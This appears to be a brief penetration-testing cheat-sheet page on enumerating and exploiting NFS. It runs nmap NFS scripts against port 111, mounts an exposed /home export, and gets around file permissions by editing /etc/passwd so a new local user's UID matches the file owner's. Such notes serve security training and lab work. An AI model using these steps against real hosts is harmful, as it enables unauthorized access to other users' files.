NFS Enumeration

NFS Enumeration

NFS is very insecure. Check port 111 for service **************rpcbind and **************portmapper

  • nmap -p 111 --script nfs* <ip> run all script

  • In Output, if showmount is visible check for the directory as it is vuln. For ex:- /home directory is being shared and we can access it by mounting it on our Kali virtual machine

  • mkdir vulnhome

  • sudo mount -o nolock <ip>:/home ~/vulnhome/ /home will mount in local vulnhome -o nolock to disable file locking

  • Check mounted directory

  • If vuln file is not accessable , check its UUID , create new user and change its uuid

  • sudo adduser <username>

  • sudo sed -i -e 's/<new user UUID>/<vuln UUID>/g' /etc/passwd

  • su <new user>

PreviousSMB EnumerationNextSMTP Enumeration

Last updated